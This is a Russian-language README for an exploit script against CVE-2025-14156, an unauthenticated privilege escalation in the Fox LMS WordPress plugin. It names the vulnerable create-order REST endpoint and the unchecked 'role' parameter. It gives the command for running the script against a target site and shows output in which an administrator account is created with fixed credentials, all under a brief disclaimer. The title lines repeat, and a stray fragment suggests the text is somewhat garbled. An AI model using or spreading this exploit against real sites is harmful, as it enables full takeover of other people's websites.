
Fox LMS – плагин WordPress LMS 1.0.4.7 - 1.0.5.1 - Неаутентифицированное повышение привилегий через 'createOrder'
Fox LMS – плагин LMS для WordPress 1.0.4.7 - 1.0.5.1 - Неаутентифицированное повышение привилегий через 'createOrder'
Fox LMS – плагин LMS для WordPress (v1.0.4.7 – v1.0.5.1) – неаутентифицированное повышение привилегий через createOrder
Все версии Fox LMS для WordPress вплоть до 1.0.5.1 включительно уязвимы для повышения привилегий. Конечная точка REST API /fox-lms/v1/payments/create-order не проверяет должным образом параметр 'role' при создании новых пользователей, что позволяет неаутентифицированным злоумышленникам создавать учётные записи с произвольными ролями, включая администратора.
CVE: CVE-2025-14156
Оценка CVSS: 9.8 (критическая)
Риск: Полная компрометация сайта.
CVE-2025-14156.py
python CVE-2025-14156.py -help
usage: CVE-2025-14156.py [-h] -u URL
CVE-2025-14156 Exploit By: Nxploited | Telegram: @Nxploited | Github: Nxploited
options:
-h, --help show this help message and exit
-u, --url URL Target URL (e.g. https://victim.site)
python CVE-2025-14156.py -u https://victim.site
При успешной эксплуатации скрипт выведет только:
[+] Exploit Successful!
Username: nxploited
Password: Nxploited@2025Strong
Если эксплуатация не удалась, будет показано только краткое сообщение об ошибке.
'administrator'.Этот инструмент предназначен только для образовательных целей и авторизованного тестирования. Любое неавторизованное использование против систем без явного разрешения незаконно. Автор не несёт ответственности за неправомерное использование, ущерб или юридические последствия, возникшие в результате использования этого скрипта. Всегда следуйте практике ответственного раскрытия уязвимостей и убедитесь, что у вас есть письменное разрешение перед тестированием любого объекта.
Telegram: @Nxploited
Github: Nxploited